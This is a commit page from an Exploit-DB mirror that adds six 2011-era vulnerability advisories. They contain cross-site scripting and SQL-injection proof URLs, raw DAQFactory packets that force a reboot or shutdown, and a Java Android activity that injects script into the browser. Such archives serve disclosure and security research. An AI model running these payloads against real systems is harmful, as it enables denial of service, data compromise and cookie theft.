bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-02-08

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2015-02-08 08:36:08 +00:00
parent 783274a13b
commit 4b9d336b5c
7 changed files with 90 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -32447,3 +32447,9 @@ id,file,description,date,author,platform,type,port
36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0
36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection Vulnerability",2011-08-01,noptrix,multiple,remote,0
36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 Browser Sandbox Security Bypass Vulnerability",2011-08-02,"Roee Hay",multiple,remote,0
36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service Vulnerability",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0
36008,platforms/php/webapps/36008.txt,"Gilnet News 'read_more.php' SQL Injection Vulnerability",2011-07-11,Err0R,php,webapps,0
36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank 'b' Parameter Cross Site Scripting Vulnerability",2011-08-03,Err0R,php,webapps,0
36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting Vulnerability",2011-08-03,Err0R,asp,webapps,0
36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability",2011-08-03,Err0R,asp,webapps,0

Can't render this file because it is too large.

7
platforms/asp/webapps/36010.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48969/info
BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script>

7
platforms/asp/webapps/36011.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48970/info
Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/name.asp?id=[SQLInjection]

20
platforms/multiple/dos/36007.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/48955/info
AzeoTech DAQFactory is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
Versions prior to DAQFactory 5.85 are vulnerable.
The following exploit requests are available:
preamble:
"\x01\x00\x09\x00CPassword\x00"
reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

36
platforms/multiple/remote/36006.java Executable file
View file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/48954/info
Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.
Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.
Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.
public class CasExploit extends Activity
{
static final String mPackage = "com.android.browser";
static final String mClass = "BrowserActivity";
static final String mUrl = "http://target.domain/";;
static final String mJavascript = "alert(document.cookie)";
static final int mSleep = 15000;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivity("javascript:" + mJavascript);
}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
res.setData(Uri.parse(url));
startActivity(res);
}
}

7
platforms/php/webapps/36008.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48966/info
Gilnet News is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/[PATH]/read_more.php?id=[Injection]

7
platforms/php/webapps/36009.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48967/info
mt LinkDatenbank is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E